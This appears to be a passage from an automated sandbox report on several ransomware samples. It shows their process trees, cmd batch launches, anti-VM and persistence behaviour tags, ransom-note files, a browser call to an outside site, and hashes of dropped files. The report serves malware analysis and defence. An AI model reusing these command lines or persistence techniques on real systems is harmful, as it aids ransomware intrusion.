                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:3472
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1736,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:3
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:928
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1992,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2584 /prefetch:8
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:1700
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3108 /prefetch:1
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:5824
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:6164
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:1
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:7132
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3272 /prefetch:1
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:7508
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4652,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4388 /prefetch:8
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:7428
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4560,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4708 /prefetch:8
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                    PID:7736
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:8
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:7948
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5228,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:8
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:6972
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5784,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5792 /prefetch:1
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:3524
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4656,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5968 /prefetch:1
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:7600
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=756,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4476 /prefetch:8
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:8060
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 2 -w 1000
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:5180
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:7068
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:7404
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:5432
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Gen.zlq-6968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949.exe
                                                                                                                                                                                                      Trojan-Ransom.Win32.Gen.zlq-6968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:3184
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\96EC.tmp\96ED.tmp\96EE.bat C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Gen.zlq-6968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                        PID:4808
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe
                                                                                                                                                                                                      Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                      PID:2456
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~9323.bat Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                        • Drops autorun.inf file
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:1500
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe
                                                                                                                                                                                                      UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:3856
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Gen.vyw-78853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a.exe
                                                                                                                                                                                                      UDS-Trojan-Ransom.Win32.Gen.vyw-78853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:4432
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1988
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:4492
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Locky-6ef270bce6969e01839651ba78e2f9dbfbbfebce95478497e07e9386214b977d.exe
                                                                                                                                                                                                      UDS-Trojan-Ransom.Win32.Locky-6ef270bce6969e01839651ba78e2f9dbfbbfebce95478497e07e9386214b977d.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:5288
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 232
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5372
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00417\VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe
                                                                                                                                                                                                      VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:5600
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.x5vv.com/
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                        PID:7896
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe851546f8,0x7ffe85154708,0x7ffe85154718
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:1728
                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:7332
                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:7012
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:7208
                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:7400
                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:2512
                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4488 /prefetch:1
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:7728
                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:5876
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4168 -ip 4168
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2032
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 692 -ip 692
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2392
                                                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x2f8 0x464
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:3720
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5288 -ip 5288
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5316
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4712 -ip 4712
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:6008
                                                                                                                                                                                                                        • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\WERE_MY _FILES.txt
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4652
                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:6556
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3492 -ip 3492
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:7904
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3492 -ip 3492
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:7188
                                                                                                                                                                                                                                • \??\c:\Siemens\svcmain.exe
                                                                                                                                                                                                                                  "c:\Siemens\svcmain.exe"
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Allows Network login with blank passwords
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Modifies WinLogon
                                                                                                                                                                                                                                  PID:6264
                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:7160
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                                                    werfault.exe /h /shared Global\a377c1d6833e490980c1c632810f2390 /t 5604 /p 5600
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:7344
                                                                                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:7180
                                                                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:6424
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:7292
                                                                                                                                                                                                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\___RECOVER__FILES__.locked.txt
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Opens file in notepad (likely ransom note)
                                                                                                                                                                                                                                            PID:7672
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                                                            werfault.exe /h /shared Global\93f6495ce696427cba1be9f1ea94cb55 /t 6324 /p 3604
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4424
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                                                              werfault.exe /h /shared Global\c9d2af3bac1444fe94d5b8cbeb2cf613 /t 372 /p 2556
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4628

                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                              • C:\ProgramData\Cpriv.key

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                4594df94a50a52dba2bb3b9ba91cc11f

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                f7cf9d3e664f8afc6ffc585980d90ccc287c9b1f

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                6495dc7973c8ef0d051ad0f762d6a0e85786c92c0568f506aa858839fa93fd43

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                57ec81726ad499ff7a7a2fac0e7d7595cb40cf7922eb1cf3d1df64313ec34cdae78967b8613d69ce45079ac143b3ada8d27aba2bfd9e6d7c9eefe2ccf2d38941

                                                                                                                                                                                                                                              • C:\ProgramData\Cpub.key

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                292B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                211ae39d86c3a1f9d4432775f742b7c5

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                3f540acfa1b2bfe8071745d618a8b3ed5a6f7e28

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                47874b88d9b8d714a2844fcb1188bf5ceeee37498fecd56f5f796257980ddd67

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                afe17ef9671c12eb8fc7c4c22c26722f2cea36010e2f2a0d95045753b76d12f05d7234ac11229174234e7c6aebe5aec3674041c349721d6a36a4977671e1e965

                                                                                                                                                                                                                                              • C:\ProgramData\Help.txt

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                116B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                4033af7388763f9e0d96faa4979cfc39

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                9d0a46cdee697101123c406df2243c771c3bd64c

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                75dfc32aa0927977c6c68486af06bdd64255b625a4977dbda0fc5ad7a69a8d66

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                259f64226df83cd77f3fee2e5ffe51662e7bf5356498791ed6a13e921296aad4743bbc6709a91cb7e93b39ab2c9e0710ee5dfde8e0cf0324adf28a3ad712543a

                                                                                                                                                                                                                                              • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\How To Decrypt Files.hta

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                e1267a318cfc4204e4df15a049aab6c7

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                9e1db464ff933f117ec7fa2a4082f845ca3767b2

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                ec43d27c529f54d6966037d8fa196ca5f0c99901151e30abb4c767c7b5e24d84

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                34dd7e18b5bb935886feaf4d2e5fc2ca0491dc85823a5e5a6a9e59650f67eff2ec83806a510724c1cb15e75208ed0584e810440844e41ef6bb7d836c5533fe6c

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                4B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                f49655f856acb8884cc0ace29216f511

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                944B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                6bd369f7c74a28194c991ed1404da30f

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

